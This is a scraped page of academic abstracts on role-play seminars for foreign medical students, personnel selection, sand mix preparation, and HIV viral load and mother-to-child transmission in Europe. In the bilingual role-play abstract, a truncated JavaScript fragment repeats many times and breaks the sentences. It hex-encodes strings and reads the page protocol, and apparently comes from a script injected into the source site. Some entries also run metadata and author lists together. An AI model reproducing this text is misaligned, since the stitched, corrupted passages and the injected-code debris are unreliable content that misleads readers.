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    ІННОВАЦІЙНІ МЕТОДИ ПРОВЕДЕННЯ СЕМІНАРСЬКИХ ЗАНЯТЬ в ІНОЗЕМНИХ СТУДЕНТІВ ПРИ ВИВЧЕННІ АКУШЕРСТВА ТА ГІНЕКОЛОГІЇ.

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    The article presents the experience of using the role-play during the seminars as one of the innovative method of teaching of foreign medical students.// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;eУ статті наведено досвід використання рольової гри при проведенні семінарських занять як один з інноваційних методів навчання іноземних студентів-медиків.// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;

    Features Of Professional And Psychological Selection Of Personnel

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    The article deals with the theoretical analysis of the personnel's professional and psychological selection. Goals, objectives and types of professional and psychological selection are studied. Indicators of professional selection are determined. Two main aspects of professional and psychological selection are: individual psychological characteristics and specific future professional activities. Solving the problem of rational distribution of personnel is impossible without the development of forecasting algorithms for differential proficiency on various types of professional activities

    INFLUENCE OF THE MIX PREPARATION METHOD ON THE QUALITATIVE CHARACTERISTICS OF AGGLUTINANT SAND

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    The results of investigations of some aspects of forming of the sand-day agglutinant sands at using of different kinds of mix preparation are given in the article

    Levels and patterns of HIV RNA viral load in untreated pregnant women.

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    none101OBJECTIVE: To assess pregnancy levels and patterns of HIV RNA in the absence of antiretroviral therapy, while appropriately adjusting for potential confounders, including maternal immune status and race. METHODS: Data on > or = 1 antenatal HIV RNA measurements were available for 333 untreated HIV-infected pregnant women enrolled in the European Collaborative Study. CD4 counts and HIV RNA measurements were routinely collected from 1992 and 1998, respectively. Linear mixed effects models based on 246 women for whom complete data were available examined changes in HIV RNA levels over pregnancy, with a nested random effects term accounting for measurement variability within women and period of sample collection. RESULTS: The change in HIV RNA over pregnancy varied significantly by race (p=0.005): from the second trimester until delivery, HIV RNA decreased significantly by an estimated 0.019 log(10) copies/ml/week in white women (95% CI -0.03, -0.007); in black women the estimated 0.016 log(10) copies/ml/week increase (95% CI -0.005, 0.037) was not statistically significant. At delivery, HIV RNA levels in black women were 0.45 log(10) copies/ml higher (95% CI 0.08, 0.83) than in white women. CONCLUSIONS: Our findings suggest that HIV RNA dynamics over pregnancy differ by race, although other interpretations cannot be excluded, due to potential for unmeasured confounding.mixedGIAQUINTO C; RAMPON O; D'ELIA R; DE ROSSI A; GROSCH-WÖRNER I; MOK J; DE JOSÉ MI; LARRÚ MARTÍNEZ B; PEÑA JM; GONZALEZ GARCIA J; ARRIBAS LOPEZ JR; GARCIA-RODRIGUEZ MC; ASENSI-BOTET F; OTERO MC; PÉREZ-TAMARIT D; SCHERPBIER HJ; KREYENBROEK M; GODFRIED MH; NELLEN FJ; BOER K; EHRNST A; BOHLIN AB; LINDGREN S; ANZÉN B; LIDMAN K; LEVY J; BARLOW P; MANIGART Y; HAINAUT M; GOETGHEBUER T; FERRAZIN A; VISCOLI C; DEMARIA A; BENTIVOGLIO G; S. FERRERO; GOTTA C; MÛR A; PAYÀ A; LÓPEZ-VILCHEZ MA; CARRERAS R; VALERIUS NH; ROSENFELDT V; JIMENEZ J; COLL O; SUY A; PEREZ JM; FORTUNY C; BOGUÑA J; CASELLAS CARO M; CANET Y; RAVIZZA M; GUERRA B; LANARI M; BIANCHI S; BOVICELLI L; PRATI E; DUSE M; SCARAVELLI G; STEGAGNO M; DE SANTIS M; SAVASI V; FIORE S; CRIVELLI M; FERRAZZI E; VIGANÒ A; GIACOMET V; CERINI C; RAIMONDI C; ZUCCOTTI G; RAVAGNI PROBIZER F; MACCABRUNI A; BUCCERI A; RANCILIO L; ALBERICO S; RABUSIN M; BERNARDON M; TAYLOR GP; LYALL EG; PENN Z; BUFFOLANO W; TISEO R; MARTINELLI P; SANSONE M; MARUOTTI G; AGANGI A; TIBALDI C; MARINI S; MASUELLI G; BENEDETTO C; NIEMIEÇ T; MARCZYNSKA M; DOBOSZ S; POPIELSKA J; OLDAKOWSKA A; MALYUTA R; SEMENENKO I; PILIPENKO T; POSOKHOVA S; KALEEVA T; STELMAH A; KISELEVA GGiaquinto, C; Rampon, O; D'Elia, R; DE ROSSI, A; GROSCH WÖRNER, I; Mok, J; DE JOSÉ, Mi; LARRÚ MARTÍNEZ, B; Peña, Jm; GONZALEZ GARCIA, J; ARRIBAS LOPEZ, Jr; GARCIA RODRIGUEZ, Mc; ASENSI BOTET, F; Otero, Mc; PÉREZ TAMARIT, D; Scherpbier, Hj; Kreyenbroek, M; Godfried, Mh; Nellen, Fj; Boer, K; Ehrnst, A; Bohlin, Ab; Lindgren, S; Anzén, B; Lidman, K; Levy, J; Barlow, P; Manigart, Y; Hainaut, M; Goetghebuer, T; Ferrazin, A; Viscoli, Claudio; DE MARIA, Andrea; Bentivoglio, Giorgio; Ferrero, Simone; Gotta, C; Mûr, A; Payà, A; LÓPEZ VILCHEZ, Ma; Carreras, R; Valerius, Nh; Rosenfeldt, V; Jimenez, J; Coll, O; Suy, A; Perez, Jm; Fortuny, C; Boguña, J; CASELLAS CARO, M; Canet, Y; Ravizza, M; Guerra, B; Lanari, M; Bianchi, S; Bovicelli, L; Prati, E; Duse, M; Scaravelli, G; Stegagno, M; DE SANTIS, M; Savasi, V; Fiore, S; Crivelli, M; Ferrazzi, E; Viganò, A; Giacomet, V; Cerini, C; Raimondi, C; Zuccotti, G; RAVAGNI PROBIZER, F; Maccabruni, A; Bucceri, A; Rancilio, L; Alberico, S; Rabusin, M; Bernardon, M; Taylor, Gp; Lyall, Eg; Penn, Z; Buffolano, W; Tiseo, R; Martinelli, P; Sansone, M; Maruotti, G; Agangi, A; Tibaldi, C; Marini, S; Masuelli, G; Benedetto, C; Niemieç, T; Marczynska, M; Dobosz, S; Popielska, J; Oldakowska, A; Malyuta, R; Semenenko, I; Pilipenko, T; Posokhova, S; Kaleeva, T; Stelmah, A; Kiseleva, G

    The mother-to-child HIV transmission epidemic in Europe: evolving in the East and established in the West

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    OBJECTIVES: To carry out an epidemiological analysis of the emerging epidemic in an Eastern European country and to compare the approach to prevention of mother-to-child transmission (MTCT) with that in Western Europe. DESIGN: Prospective cohort study established in 1985 in Western Europe and extended to Ukraine in 2000. METHODS: Data on 5967 HIV-infected pregnant women and their infants (1251 from Ukraine and 4716 from Western/Central Europe) was analysed. Factors associated with transmission were identified with logistic regression. RESULTS: HIV-infection among pregnant women enrolled in Western European centres has shifted from being largely injecting drug use (IDU)-related to heterosexually-acquired; in Ukraine IDU also gradually declined with women increasingly identified without specific risk factors. In Ukraine in 2000-2004 most (80%) women received single dose nevirapine (sdNVP) and/or short-course zidovudine prophylaxis [MTCT rate 4.2%; 95% confidence interval (CI), 1.8-8.0 for sdNVP with short-course zidovudine]; 2% (n = 27) received antenatal HAART and 33% (n = 418) delivered by elective caesarean section (CS); in Western European centres 72% of women received HAART (MTCT rate 1.0%; 95% CI, 0.4-1.9) and 66% delivered by elective CS during the same period. CONCLUSIONS: Our findings indicate distinct differences in the epidemics in pregnant women across Europe. The evolution of the MTCT epidemic in Ukraine does not appear to be following the same pattern as that in Western Europe in the 1980s and 1990s. Although uptake of preventive MTCT prophylaxis has been rapid in both Western Europe and Ukraine, substantial challenges remain in the more resource-constrained setting in Eastern Europe
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